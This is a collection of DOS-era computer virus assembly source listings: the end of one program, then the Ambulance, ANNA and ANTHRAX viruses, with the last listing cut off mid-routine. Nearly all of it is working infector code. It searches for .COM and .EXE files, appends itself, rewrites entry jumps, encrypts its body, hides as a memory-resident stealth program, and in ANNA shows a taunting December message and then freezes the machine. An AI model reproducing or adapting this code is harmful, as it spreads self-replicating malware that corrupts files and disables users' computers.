		mov	al,bl
		dec	al
		pop	dx
		pop	bx
		mov	[bx+si],al
		pop	ax
		dec	ah
		jz	loc_268			; Jump if zero
		inc	dx
		jmp	short loc_266
loc_267:
		add	sp,6
loc_268:
		pop	di
		pop	es
		pop	ax
		retn

; External Entry into Subroutine 

sub_82:
		mov	al,41h			; 'A'
		mov	dx,0C1Dh
		mov	di,0
		call	sub_85
		retn

; External Entry into Subroutine 

sub_83:
		call	sub_82
		call	sub_84
		retn

; External Entry into Subroutine 

sub_84:
		mov	al,42h			; 'B'
		mov	dx,0E1Dh
		mov	di,1
		call	sub_85
		retn

; External Entry into Subroutine 

sub_85:
		mov	data_225,al
		mov	si,2C8Bh
		call	sub_14
		mov	al,[di+0Dh]
		nop				;*ASM fixup - displacement
		cbw				; Convrt byte to word
		add	ax,ax
		mov	si,ax
		mov	bx,offset data_32
		mov	si,[bx+si]
		call	sub_15
		retn

; External Entry into Subroutine 

sub_86:
		mov	ah,51h			; 'Q'
		int	21h			; DOS Services  ah=function 51h
						;  get active PSP segment in bx
						;*  undocumented function
		mov	data_231,bx
		mov	ax,300Eh
		mov	data_232,ax
		xor	ax,ax			; Zero register
loc_269:
		mov	ds,ax
		xor	si,si			; Zero register
		cld				; Clear direction
		lodsb				; String [si] to al
		cmp	al,4Dh			; 'M'
		je	loc_271			; Jump if equal
loc_270:
		push	ds
		pop	ax
		inc	ax
		jmp	short loc_269
loc_271:
		push	ds
		mov	si,data_3e
		lodsw				; String [si] to ax
		pop	bx
		add	bx,ax
		inc	bx
		jc	loc_270			; Jump if carry Set
		cmp	cs:data_231,bx
		jb	loc_270			; Jump if below
		push	ds
		mov	ds,bx
		cmp	byte ptr ds:data_17e,4Dh	; 'M'
		nop				;*ASM fixup - sign extn byte
		je	loc_272			; Jump if equal
		pop	ds
		jmp	short loc_270
loc_272:
		mov	di,cs:data_232
		push	cs
		pop	es
		mov	bx,ds
		pop	ds
		mov	ax,ds
		stosw				; Store ax to es:[di]
		mov	ax,bx
		stosw				; Store ax to es:[di]
		mov	ds,bx
loc_273:
		push	ds
		mov	si,data_3e
		lodsw				; String [si] to ax
		pop	bx
		add	bx,ax
		inc	bx
		mov	ax,bx
		stosw				; Store ax to es:[di]
		mov	ds,bx
		xor	si,si			; Zero register
		lodsb				; String [si] to al
		cmp	al,5Ah			; 'Z'
		jne	loc_273			; Jump if not equal
		xor	ax,ax			; Zero register
		stosw				; Store ax to es:[di]
		push	cs
		pop	ds
		mov	si,di
		sub	si,6
		lodsw				; String [si] to ax
		mov	data_26,ax
		lodsw				; String [si] to ax
		mov	data_27,ax
		mov	si,offset data_233
loc_274:
		mov	ax,[si]
		cmp	ax,0
		je	loc_275			; Jump if equal
		mov	es,ax
		mov	ax,es:data_2e
		add	ax,10h
		mov	es,ax
		mov	di,data_18e
		cmp	word ptr es:[di],0EBFEh
		je	loc_276			; Jump if equal
		add	si,2
		jmp	short loc_274
loc_275:
		push	cs
		pop	es
		retn
loc_276:
		mov	dx,offset data_221	; ('')
		mov	ah,9
		int	21h			; DOS Services  ah=function 09h
						;  display char string at ds:dx
loc_277:
		call	sub_11
		mov	ax,4C00h
		int	21h			; DOS Services  ah=function 4Ch
						;  terminate with al=return code
sub_80		endp


;
;			       SUBROUTINE
;

sub_87		proc	near
		push	es
		push	ax
		push	si
		push	dx
		mov	ah,35h			; '5'
		int	21h			; DOS Services  ah=function 35h
						;  get intrpt vector al in es:bx
		pop	dx
		pop	si
		pop	ax
		mov	[si],bx
		mov	[si+2],es
		mov	ah,25h			; '%'
		int	21h			; DOS Services  ah=function 25h
						;  set intrpt vector al to ds:dx
		pop	es
		retn
sub_87		endp


;
;			       SUBROUTINE
;

sub_88		proc	near
loc_278:
		call	sub_19
		mov	dh,8
		mov	dl,17h
		mov	si,2C65h
		call	sub_14
		mov	al,data_28
		cbw				; Convrt byte to word
		dec	al
		mov	di,ax
		add	di,di
		mov	bx,offset data_229
		call	word ptr [bx+di]	;*
		mov	dh,12h
		mov	dl,18h
		mov	si,2C9Eh
		call	sub_14
		call	sub_13
loc_279:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,0Dh
		je	loc_ret_282		; Jump if equal
		cmp	al,1Bh
		jne	loc_280			; Jump if not equal
		jmp	short loc_ret_282
		db	90h
loc_280:
		and	al,0DFh
		cmp	al,59h			; 'Y'
		je	loc_ret_282		; Jump if equal
		cmp	al,4Eh			; 'N'
		je	loc_281			; Jump if equal
		call	sub_11
		jmp	short loc_279
loc_281:
		call	sub_89

loc_ret_282:
		retn
sub_88		endp


;
;			       SUBROUTINE
;

sub_89		proc	near
		call	sub_19
		mov	dh,12h
		mov	dl,0Eh
		mov	si,2CC2h
		call	sub_14
		call	sub_13
loc_283:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,31h			; '1'
		jge	loc_285			; Jump if > or =
loc_284:
		call	sub_11
		jmp	short loc_283
loc_285:
		cmp	al,32h			; '2'
		jg	loc_284			; Jump if >
		mov	data_224,al
		and	al,0Fh
		mov	data_28,al
		cbw				; Convrt byte to word
		push	ax
		mov	dh,8
		mov	dl,17h
		mov	si,2C65h
		call	sub_14
		mov	al,41h			; 'A'
		mov	byte ptr data_227+62h,al	; ('')
		xor	di,di			; Zero register
		mov	bx,0Dh
loc_286:
		mov	dh,12h
		mov	dl,0Eh
		mov	si,2CF8h
		call	sub_14
		call	sub_13
		mov	al,33h			; '3'
		mov	data_102,al
		mov	data_89,2FCDh
		call	sub_16
		mov	[bx+di],al
		push	bx
		push	di
		shl	di,1			; Shift w/zeros fill
		mov	bx,offset data_229
		call	word ptr [bx+di]	;*
		pop	di
		pop	bx
		inc	di
		pop	ax
		cmp	di,ax
		je	loc_287			; Jump if equal
		push	ax
		inc	byte ptr data_227+62h	; ('')
		jmp	short loc_286
loc_287:
		pop	ax
		jmp	loc_278
sub_89		endp

data_229	dw	offset sub_82
data_230	dw	offset sub_83
data_231	dw	0
data_232	dw	0
data_233	dw	100 dup (0)

seg_a		ends



		end	start
.............................................................................


PAGE  59,132

;
;								         
;			        AMBULANC			         
;								         
;      Created:   13-Feb-92					         
;      Passes:    5	       Analysis Options on: none	         
;								         
;

data_1e		equ	0Ch
data_2e		equ	49h
data_3e		equ	6Ch
psp_envirn_seg	equ	2Ch
data_20e	equ	0C80h

seg_a		segment	byte public
		assume	cs:seg_a, ds:seg_a


		org	100h

ambulanc	proc	far

start:
		jmp	loc_1
		db	0
data_7		dw	0			; Data table (indexed access)
		db	44 dup (0)
loc_1:
;*		call	sub_1			;*
		db	0E8h, 01h, 00h
		add	[bp-7Fh],bx
		out	dx,al			; port 0, DMA-1 bas&add ch 0
		add	ax,[bx+di]
		call	sub_2
		call	sub_2
		call	sub_4
		lea	bx,[si+419h]		; Load effective addr
		mov	di,100h
		mov	al,[bx]
		mov	[di],al
		mov	ax,[bx+1]
		mov	[di+1],ax
		jmp	di			;*Register jump

loc_ret_2:
		retn

ambulanc	endp

;
;			       SUBROUTINE
;

sub_2		proc	near
		call	sub_3
		mov	al,byte ptr data_19[si]
		or	al,al			; Zero ?
		jz	loc_ret_2		; Jump if zero
		lea	bx,[si+40Fh]		; Load effective addr
		inc	word ptr [bx]
		lea	dx,[si+428h]		; Load effective addr
		mov	ax,3D02h
		int	21h			; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		mov	data_12[si],ax
		mov	bx,data_12[si]
		mov	cx,3
		lea	dx,[si+414h]		; Load effective addr
		mov	ah,3Fh			; '?'
		int	21h			; DOS Services  ah=function 3Fh
						;  read file, bx=file handle
						;   cx=bytes to ds:dx buffer
		mov	al,data_10[si]
		cmp	al,0E9h
		jne	loc_3			; Jump if not equal
		mov	dx,data_11[si]
		mov	bx,data_12[si]
		add	dx,3
		xor	cx,cx			; Zero register
		mov	ax,4200h
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, bx=file handle
						;   al=method, cx,dx=offset
		mov	bx,data_12[si]
		mov	cx,6
		lea	dx,[si+41Ch]		; Load effective addr
		mov	ah,3Fh			; '?'
		int	21h			; DOS Services  ah=function 3Fh
						;  read file, bx=file handle
						;   cx=bytes to ds:dx buffer
		mov	ax,data_13[si]
		mov	bx,data_14[si]
		mov	cx,data_15[si]
		cmp	ax,word ptr ds:[100h][si]
		jne	loc_3			; Jump if not equal
		cmp	bx,word ptr ds:[102h][si]
		jne	loc_3			; Jump if not equal
		cmp	cx,data_7[si]
		je	loc_4			; Jump if equal
loc_3:
		mov	bx,data_12[si]
		xor	cx,cx			; Zero register
		xor	dx,dx			; Zero register
		mov	ax,4202h
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, bx=file handle
						;   al=method, cx,dx=offset
		sub	ax,3
		mov	data_9[si],ax
		mov	bx,data_12[si]
		mov	ax,5700h
		int	21h			; DOS Services  ah=function 57h
						;  get file date+time, bx=handle
						;   returns cx=time, dx=time
		push	cx
		push	dx
		mov	bx,data_12[si]
		mov	cx,319h
		lea	dx,[si+100h]		; Load effective addr
		mov	ah,40h			; '@'
		int	21h			; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov	bx,data_12[si]
		mov	cx,3
		lea	dx,[si+414h]		; Load effective addr
		mov	ah,40h			; '@'
		int	21h			; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov	bx,data_12[si]
		xor	cx,cx			; Zero register
		xor	dx,dx			; Zero register
		mov	ax,4200h
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, bx=file handle
						;   al=method, cx,dx=offset
		mov	bx,data_12[si]
		mov	cx,3
		lea	dx,[si+411h]		; Load effective addr
		mov	ah,40h			; '@'
		int	21h			; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		pop	dx
		pop	cx
		mov	bx,data_12[si]
		mov	ax,5701h
		int	21h			; DOS Services  ah=function 57h
						;  set file date+time, bx=handle
						;   cx=time, dx=time
loc_4:
		mov	bx,data_12[si]
		mov	ah,3Eh			; '>'
		int	21h			; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
		retn
sub_2		endp


;
;			       SUBROUTINE
;

sub_3		proc	near
		mov	ax,ds:psp_envirn_seg
		mov	es,ax
		push	ds
		mov	ax,40h
		mov	ds,ax
		mov	bp,ds:data_3e
		pop	ds
		test	bp,3
		jz	loc_7			; Jump if zero
		xor	bx,bx			; Zero register
loc_5:
		mov	ax,es:[bx]
		cmp	ax,4150h
		jne	loc_6			; Jump if not equal
		cmp	word ptr es:[bx+2],4854h
		je	loc_8			; Jump if equal
loc_6:
		inc	bx
		or	ax,ax			; Zero ?
		jnz	loc_5			; Jump if not zero
loc_7:
		lea	di,[si+428h]		; Load effective addr
		jmp	short loc_13
loc_8:
		add	bx,5
loc_9:
		lea	di,[si+428h]		; Load effective addr
loc_10:
		mov	al,es:[bx]
		inc	bx
		or	al,al			; Zero ?
		jz	loc_12			; Jump if zero
		cmp	al,3Bh			; ';'
		je	loc_11			; Jump if equal
		mov	[di],al
		inc	di
		jmp	short loc_10
loc_11:
		cmp	byte ptr es:[bx],0
		je	loc_12			; Jump if equal
		shr	bp,1			; Shift w/zeros fill
		shr	bp,1			; Shift w/zeros fill
		test	bp,3
		jnz	loc_9			; Jump if not zero
loc_12:
		cmp	byte ptr [di-1],5Ch	; '\'
		je	loc_13			; Jump if equal
		mov	byte ptr [di],5Ch	; '\'
		inc	di
loc_13:
		push	ds
		pop	es
		mov	data_16[si],di
		mov	ax,2E2Ah
		stosw				; Store ax to es:[di]
		mov	ax,4F43h
		stosw				; Store ax to es:[di]
		mov	ax,4Dh
		stosw				; Store ax to es:[di]
		push	es
		mov	ah,2Fh			; '/'
		int	21h			; DOS Services  ah=function 2Fh
						;  get DTA ptr into es:bx
		mov	ax,es
		mov	data_17[si],ax
		mov	data_18[si],bx
		pop	es
		lea	dx,[si+478h]		; Load effective addr
		mov	ah,1Ah
		int	21h			; DOS Services  ah=function 1Ah
						;  set DTA(disk xfer area) ds:dx
		lea	dx,[si+428h]		; Load effective addr
		xor	cx,cx			; Zero register
		mov	ah,4Eh			; 'N'
		int	21h			; DOS Services  ah=function 4Eh
						;  find 1st filenam match @ds:dx
		jnc	loc_14			; Jump if carry=0
		xor	ax,ax			; Zero register
		mov	data_19[si],ax
		jmp	short loc_17
loc_14:
		push	ds
		mov	ax,40h
		mov	ds,ax
		ror	bp,1			; Rotate
		xor	bp,ds:data_3e
		pop	ds
		test	bp,7
		jz	loc_15			; Jump if zero
		mov	ah,4Fh			; 'O'
		int	21h			; DOS Services  ah=function 4Fh
						;  find next filename match
		jnc	loc_14			; Jump if carry=0
loc_15:
		mov	di,data_16[si]
		lea	bx,[si+496h]		; Load effective addr
loc_16:
		mov	al,[bx]
		inc	bx
		stosb				; Store al to es:[di]
		or	al,al			; Zero ?
		jnz	loc_16			; Jump if not zero
loc_17:
		mov	bx,data_18[si]
		mov	ax,data_17[si]
		push	ds
		mov	ds,ax
		mov	ah,1Ah
		int	21h			; DOS Services  ah=function 1Ah
						;  set DTA(disk xfer area) ds:dx
		pop	ds
		retn
sub_3		endp


;
;			       SUBROUTINE
;

sub_4		proc	near
		push	es
		mov	ax,data_8[si]
		and	ax,7
		cmp	ax,6
		jne	loc_18			; Jump if not equal
		mov	ax,40h
		mov	es,ax
		mov	ax,es:data_1e
		or	ax,ax			; Zero ?
		jnz	loc_18			; Jump if not zero
		inc	word ptr es:data_1e
		call	sub_5
loc_18:
		pop	es
		retn
sub_4		endp


;
;			       SUBROUTINE
;

sub_5		proc	near
		push	ds
		mov	di,0B800h
		mov	ax,40h
		mov	ds,ax
		mov	al,ds:data_2e
		cmp	al,7
		jne	loc_19			; Jump if not equal
		mov	di,0B000h
loc_19:
		mov	es,di
		pop	ds
		mov	bp,0FFF0h
loc_20:
		mov	dx,0
		mov	cx,10h

locloop_21:
		call	sub_8
		inc	dx
		loop	locloop_21		; Loop if cx > 0

		call	sub_7
		call	sub_9
		inc	bp
		cmp	bp,50h
		jne	loc_20			; Jump if not equal
		call	sub_6
		push	ds
		pop	es
		retn
sub_5		endp


;
;			       SUBROUTINE
;

sub_6		proc	near
		in	al,61h			; port 61h, 8255 port B, read
		and	al,0FCh
		out	61h,al			; port 61h, 8255 B - spkr, etc
						;  al = 0, disable parity
		retn
sub_6		endp


;
;			       SUBROUTINE
;

sub_7		proc	near
		mov	dx,7D0h
		test	bp,4
		jz	loc_22			; Jump if zero
		mov	dx,0BB8h
loc_22:
		in	al,61h			; port 61h, 8255 port B, read
		test	al,3
		jnz	loc_23			; Jump if not zero
		or	al,3
		out	61h,al			; port 61h, 8255 B - spkr, etc
		mov	al,0B6h
		out	43h,al			; port 43h, 8253 wrt timr mode
loc_23:
		mov	ax,dx
		out	42h,al			; port 42h, 8253 timer 2 spkr
		mov	al,ah
		out	42h,al			; port 42h, 8253 timer 2 spkr
		retn
sub_7		endp


;
;			       SUBROUTINE
;

sub_8		proc	near
		push	cx
		push	dx
		lea	bx,[si+3BFh]		; Load effective addr
		add	bx,dx
		add	dx,bp
		or	dx,dx			; Zero ?
		js	loc_26			; Jump if sign=1
		cmp	dx,50h
		jae	loc_26			; Jump if above or =
		mov	di,data_20e
		add	di,dx
		add	di,dx
		sub	dx,bp
		mov	cx,5

locloop_24:
		mov	ah,7
		mov	al,[bx]
		sub	al,7
		add	al,cl
		sub	al,dl
		cmp	cx,5
		jne	loc_25			; Jump if not equal
		mov	ah,0Fh
		test	bp,3
		jz	loc_25			; Jump if zero
		mov	al,20h			; ' '
loc_25:
		stosw				; Store ax to es:[di]
		add	bx,10h
		add	di,9Eh
		loop	locloop_24		; Loop if cx > 0

loc_26:
		pop	dx
		pop	cx
		retn
sub_8		endp


;
;			       SUBROUTINE
;

sub_9		proc	near
		push	ds
		mov	ax,40h
		mov	ds,ax
		mov	ax,ds:data_3e
loc_28:
		cmp	ax,ds:data_3e
		je	loc_28			; Jump if equal
		pop	ds
		retn
sub_9		endp

		and	ah,[bp+di]
		and	al,25h			; '%'
		db	 26h, 27h, 28h, 29h, 66h, 87h
		db	 3Bh, 2Dh, 2Eh, 2Fh, 30h, 31h
		db	 23h,0E0h,0E1h,0E2h,0E3h,0E4h
		db	0E5h,0E6h,0E7h,0E7h,0E9h,0EAh
		db	0EBh
		db	30h
data_8		dw	3231h			; Data table (indexed access)
		db	24h
data_9		dw	0E1E0h			; Data table (indexed access)
data_10		db	0E2h			; Data table (indexed access)
data_11		dw	0E8E3h			; Data table (indexed access)
data_12		dw	0EA2Ah			; Data table (indexed access)
		db	0E7h,0E8h,0E9h
data_13		dw	302Fh			; Data table (indexed access)
data_14		dw	326Dh			; Data table (indexed access)
data_15		dw	2533h			; Data table (indexed access)
data_16		dw	0E2E1h			; Data table (indexed access)
data_17		dw	0E4E3h			; Data table (indexed access)
data_18		dw	0E7E5h			; Data table (indexed access)
data_19		dw	0E8E7h			; Data table (indexed access)
		db	0E9h,0EAh,0EBh,0ECh,0EDh,0EEh
		db	0EFh, 26h,0E6h,0E7h, 29h, 59h
		db	 5Ah, 2Ch,0ECh,0EDh,0EEh,0EFh
		db	0F0h, 32h, 62h, 34h,0F4h, 0Ah
		db	 00h,0E9h, 2Fh, 00h,0CDh, 20h
		db	 00h, 05h, 00h,0CDh, 20h, 00h

seg_a		ends



		end	start
.............................................................................



                                Name     ANNA
                                Page 55,132
                                Title ????

len             equ offset marker+5-offset main2
level1len       equ offset level1-offset main3
level2len       equ offset level2-offset main3

code segment 

                assume cs:code,ds:code,es:code

                org 0100h

main:           xor si,si
                call level2
                call level1
                jmp main2
                dd 0h

main2:          call nextline
nextline:       pop ax
                sub ax,offset nextline
                xchg si,ax
                call level1
                call level2
main3:          mov ax,word ptr ds:[oldstart+si]    
                mov cx,word ptr ds:[oldstart+si+2]
                mov ds:[0100h],ax
                mov ds:[0102h],cx

getdate:        mov ah,2ah
                int 21h
                jnc notexit

lexit:          jmp exit

notexit:        cmp dh,0ch
                jne getdir

                jmp activ8

getdir:         mov ah,47h
                mov dl,00h
                push si
                lea bx,(curdir+si)
                mov si,bx
                int 21h
                jc lexit

                pop si
                mov byte ptr ds:[flag+si],00h

setdta:         mov ah,1ah
                lea dx,(buff+si)
                int 21h

findfile:       mov ah,4eh
                mov cx,00h
                lea dx,(search1+si)
                int 21h
                jnc openup

                cmp al,12h
                jne lexit
                jmp next_dir


openup:         mov ah,3dh
                mov al,02h
                lea dx,(buff+1eh+si)
                int 21h
                jc lexit
                mov ds:[handle+si],ax

movepoint:      mov ax,4202h
                mov bx,ds:[handle+si]
                mov cx,0ffffh
                mov dx,0fffbh
                int 21h
                jc lclose
                jmp checkmark 

lclose:         jmp close

checkmark:      mov ah,3fh
                mov bx,ds:[handle+si]
                mov cx,05h
                lea dx,(check+si)
                int 21h
                jc lclose
                lea di,(marker+si)
                lea ax,(check+si)
                xchg si,ax
                mov cx,05h
compare:        cmpsb
                jnz infect
                loop compare
                xchg si,ax
                jmp next_file


infect:         xchg si,ax
                mov ax,4200h
                mov bx,ds:[handle+si]
                xor cx,cx
                xor dx,dx
                int 21h
                jc lclose
                mov ah,3fh
                mov bx,ds:[handle+si]
                lea dx,(oldstart+si)
                mov cx,4
                int 21h
                jc lclose
                mov ax,4202h
                mov bx,ds:[handle+si]
                xor cx,cx
                xor dx,dx
                int 21h
                jc lclose
                sub ax,3h
                mov word ptr ds:[jump+1+si],ax
                call save
                mov ax,4200h
                mov bx,ds:[handle+si]
                xor cx,cx
                xor dx,dx
                int 21h
                mov ah,40h
                mov bx,ds:[handle+si]
                mov cx,3
                lea dx,(jump+si)
                int 21h
                mov ah,3bh
                lea dx,(bkslash+si)
                int 21h


                jmp close

next_dir:       cmp ds:[dir_count],20
                je exit
                mov ah,1ah
                lea dx,(buff2+si)
                int 21h
                mov ah,3bh
                lea dx,(bslsh+si)
                int 21h
                cmp byte ptr ds:[flag+si],00h
                jne nextdir2
                mov byte ptr ds:[flag+si],0ffh
                mov ah,4eh
                lea dx,(search2+si)
                xor cx,cx 
                mov bx,cx
                mov cl,10h
                int 21h
                jc exit
                jmp chdir

nextdir2:       mov ah,4fh
                int 21h
                jc exit

                inc ds:[dir_count+si] 

chdir:          mov ah,3bh
                lea dx,(buff2+1eh+si)
                int 21h
                jmp setdta

activ8:         mov ah,09h
                lea dx,(msg+si)
                int 21h
crash:          jmp crash


close:          mov ah,3eh
                mov bx,ds:[handle+si]
                int 21h
                 
runold:         mov ax,0100h
                jmp ax

next_file:      mov ah,3eh
                mov bx,ds:[handle+si]
                int 21h

                mov ah,4fh
                int 21h
                jc next_dir
                 
                jmp openup

exit:           mov ah,3bh
                lea dx,(curdir+si)
                int 21h
                jmp runold

info            db '[ANNA]',00h
                db 'Slartibartfast, ARCV NuKE the French',00h


msg             db 0dh,0ah,07h,0dh
                db '   Have a Cool Yule from the ARcV',0dh,0ah 
                db '          xCept Anna Jones',0dh,0ah 
                db 'I hope you get run over by a Reindeer',0dh,0ah 
                db '      Santas bringin',39,' you a Bomb',0dh,0ah 
                db '    All my Lurve - SLarTiBarTfAsT',0dh,0ah 
                db '(c) ARcV 1992 - England Raining Again',0dh,0ah
                db '$'

oldstart:       mov ah,4ch
                int 21h

jump            db 0e9h,0,0
flag            db 00h
bslsh           db '\',00h
search2         db '*. ',00h
search1         db '*.com',00h

level2:         lea di,(main3+si)
                mov cx,level2len
enc2:           mov al,byte ptr ds:[di]
                rol al,4
                stosb
                loop enc2
                ret

level1:         lea di,(main3+si)
                mov cx,level1len
inc1:           xor byte ptr ds:[di],01h
key:            inc di
                loop inc1
                ret

save:           inc byte ptr ds:[key-1+si]
                call level2
                call level1
                mov ah,40h
                mov bx,ds:[handle+si]
                mov cx,len
                lea dx,(main2+si)
                int 21h
                call level1
                call level2
                ret


marker          db 'ImIr8'

bkslash         db '\'
curdir          db 64 dup (0)
handle          dw 0h
buff            db 60h dup (0)
buff2           db 60h dup (0)
check           db 5 dup (?) 
dir_count       dw 0h



code ends

end main
.............................................................................


;**************************************************************************
;**                        ANTHRAX VIRUS                                 **
;**      Created: 2 Jan 90           Programmer: (c) Damage, Inc.        **
;** [NukE] Notes: Another Stealth Type of Virus! and this one is Detected**
;**               by Scan (McAfee & Assc.) And does copy itself to *.COM **
;**               *.EXE and the Command.Com and is Memory Resident!      **
;**                                                                      **
;** Sources brought to you by -> Rock Steady [NukE]s Head Programmer!    **
;**                                                                      **
;**************************************************************************

.286p

DATA_1E		EQU	46CH			; (0000:046C=2DH)
DATA_2E		EQU	4			; (65AC:0004=0)
DATA_3E		EQU	7			; (65AC:0007=0)
DATA_10E	EQU	5FEH			; (65AC:05FE=0)

SEG_A		SEGMENT	BYTE PUBLIC
		ASSUME	CS:SEG_A, DS:SEG_A


		ORG	100h

ANTHRAX		PROC	FAR

START:
		JMP	LOC_24			; (043B)
		DB	13 DUP (0)
		DB	95H, 8CH, 0C8H, 2DH, 0, 0
		DB	0BAH, 0, 0, 50H, 52H, 1EH
		DB	33H, 0C9H, 8EH, 0D9H, 0BEH, 4CH
		DB	0, 0B8H, 0CDH, 0, 8CH, 0CAH
		DB	87H, 44H, 44H, 87H, 54H, 46H
		DB	52H, 50H, 0C4H, 1CH, 0B4H, 13H
		DB	0CDH, 2FH, 6, 53H, 0B4H, 13H
		DB	0CDH, 2FH, 58H, 5AH, 87H, 4
		DB	87H, 54H, 2, 52H, 50H, 51H
		DB	56H, 0A0H, 3FH, 4, 0A8H, 0FH
		DB	75H, 6CH, 0EH, 7, 0BAH, 80H
		DB	0, 0B1H, 3, 0BBH, 77H, 6
		DB	0B8H, 1, 2, 50H, 0CDH, 13H
		DB	58H, 0B1H, 1, 0BBH, 0, 4
		DB	0CDH, 13H, 0EH, 1FH, 0BEH, 9BH
		DB	3, 8BH, 0FBH, 0B9H, 5EH, 0
		DB	56H, 0F3H, 0A6H, 5EH, 8BH, 0FBH
		DB	0B9H, 62H, 0, 56H, 0F3H, 0A4H
		DB	5FH, 0BEH, 12H, 8, 0B9H, 65H
		DB	0, 0F3H, 0A4H, 74H, 1EH, 89H
		DB	4DH, 0E9H, 0B1H, 5CH, 89H, 4DH
		DB	9BH, 88H, 6DH, 0DCH, 0B1H, 2
		DB	33H, 0DBH, 0B8H, 2, 3, 0CDH
		DB	13H, 49H, 0BBH, 0, 4, 0B8H
		DB	1, 3, 0CDH, 13H, 49H, 0B4H
		DB	19H, 0CDH, 21H, 50H, 0B2H, 2
		DB	0B4H, 0EH, 0CDH, 21H, 0B7H, 2
		DB	0E8H, 87H, 1, 5AH, 0B4H, 0EH
		DB	0CDH, 21H, 5EH, 1FH, 8FH, 4
		DB	8FH, 44H, 2, 8FH, 44H, 44H
		DB	8FH, 44H, 46H, 1FH, 1EH, 7
		DB	95H, 0CBH
copyright	DB	'(c) Damage, Inc.'
		DB	0, 0B0H, 3, 0CFH, 6, 1EH
		DB	57H, 56H, 50H, 33H, 0C0H, 8EH
		DB	0D8H, 0BEH, 86H, 0, 0EH, 7
		DB	0BFH, 8, 6, 0FDH, 0ADH, 0ABH
		DB	0A5H, 0AFH, 87H, 0F7H, 0ADH, 0FCH
		DB	74H, 11H, 1EH, 7, 0AFH, 0B8H
		DB	7, 1, 0ABH, 8CH, 0C8H, 0ABH
		DB	8EH, 0D8H, 0BFH, 68H, 0, 0A5H
		DB	0A5H, 58H, 5EH, 5FH, 1FH, 7
		DB	2EH, 0FFH, 2EH, 0, 6, 6
		DB	1EH, 57H, 56H, 52H, 51H, 53H
		DB	50H, 0EH, 1FH, 0BEH, 6, 6
		DB	33H, 0C9H, 8EH, 0C1H, 0BFH, 84H
		DB	0, 0A5H, 0A5H, 0B4H, 52H, 0CDH
		DB	21H, 26H, 8BH, 47H, 0FEH, 8EH
		DB	0D8H, 0BBH, 3, 0, 3, 7
		DB	40H, 8EH, 0D8H, 81H, 7, 80H
		DB	0, 0EH, 7, 0B7H, 12H, 0E8H
		DB	0F2H, 0, 58H, 5BH, 59H, 5AH
		DB	5EH, 5FH, 1FH, 7, 2EH, 0FFH
		DB	2EH, 6, 6
  
LOC_RET_1:
		RETN
		DB	91H, 0AEH, 0B4H, 0A8H, 0BFH
		DB	20H, 31H, 39H, 39H, 30H
  
ANTHRAX		ENDP
  
;
;			       SUBROUTINE
;
  
SUB_1		PROC	NEAR
		MOV	AX,3D00H
		INT	21H			; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		JC	LOC_RET_1		; Jump if carry Set
		XCHG	AX,BX
		MOV	AX,1220H
		INT	2FH			; Multiplex/Spooler al=func 20h
		PUSH	BX
		MOV	BL,ES:[DI]
		MOV	AX,1216H
		INT	2FH			; Multiplex/Spooler al=func 16h
		POP	BX
		MOV	SI,462H
		MOV	DX,SI
		MOV	CL,18H
		MOV	AH,3FH			; '?'
		INT	21H			; DOS Services  ah=function 3Fh
						;  read file, cx=bytes, to ds:dx
		XOR	AX,CX
		JNZ	LOC_7			; Jump if not zero
		PUSH	ES
		POP	DS
		MOV	BYTE PTR [DI+2],2
		XOR	DX,DX			; Zero register
LOC_2:
		IN	AL,DX			; port 0, DMA-1 bas&add ch 0
		CMP	AL,10H
		JB	LOC_2			; Jump if below
		ADD	AX,[DI+11H]
		ADC	DX,[DI+13H]
		AND	AL,0F0H
		CMP	AX,0FB00H
		JAE	LOC_7			; Jump if above or =
		MOV	[DI+15H],AX
		MOV	[DI+17H],DX
		PUSH	CS
		POP	DS
		PUSH	AX
		MOV	CL,10H
		DIV	CX			; ax,dx rem=dx:ax/reg
		SUB	AX,[SI+8]
		MOV	CX,AX
		SUB	AX,[SI+16H]
		MOV	DS:DATA_2E,AX		; (65AC:0004=0)
		LODSW				; String [si] to ax
		XOR	AX,5A4DH
		JZ	LOC_3			; Jump if zero
		XOR	AX,1717H
LOC_3:
		PUSHF				; Push flags
		JNZ	LOC_4			; Jump if not zero
		MOV	[SI],AX
		CMP	AX,[SI+0AH]
		XCHG	AX,[SI+12H]
		MOV	DS:DATA_3E,AX		; (65AC:0007=0)
		MOV	[SI+14H],CX
		MOV	CX,4DCH
		JZ	LOC_5			; Jump if zero
		ADD	WORD PTR [SI+8],48H
LOC_4:
		MOV	CX,65H
LOC_5:
		PUSH	CX
		MOV	CX,39BH
		MOV	AH,40H			; '@'
		INT	21H			; DOS Services  ah=function 40h
						;  write file cx=bytes, to ds:dx
		XOR	CX,AX
		POP	CX
		JNZ	LOC_6			; Jump if not zero
		MOV	DX,400H
		MOV	AH,40H			; '@'
		INT	21H			; DOS Services  ah=function 40h
						;  write file cx=bytes, to ds:dx
		XOR	CX,AX
LOC_6:
		POP	DX
		POP	AX
LOC_7:
		JNZ	LOC_11			; Jump if not zero
		MOV	ES:[DI+15H],CX
		MOV	ES:[DI+17H],CX
		PUSH	DX
		POPF				; Pop flags
		JNZ	LOC_9			; Jump if not zero
		MOV	AX,ES:[DI+11H]
		MOV	DX,ES:[DI+13H]
		MOV	CH,2
		DIV	CX			; ax,dx rem=dx:ax/reg
		TEST	DX,DX
		JZ	LOC_8			; Jump if zero
		INC	AX
LOC_8:
		MOV	[SI],DX
		MOV	[SI+2],AX
		JMP	SHORT LOC_10		; (0328)
LOC_9:
		MOV	BYTE PTR [SI-2],0E9H
		ADD	AX,328H
		MOV	[SI-1],AX
LOC_10:
		MOV	CX,18H
		LEA	DX,[SI-2]		; Load effective addr
		MOV	AH,40H			; '@'
		INT	21H			; DOS Services  ah=function 40h
						;  write file cx=bytes, to ds:dx
LOC_11:
		OR	BYTE PTR ES:[DI+6],40H	; '@'
		MOV	AH,3EH			; '>'
LOC_12:
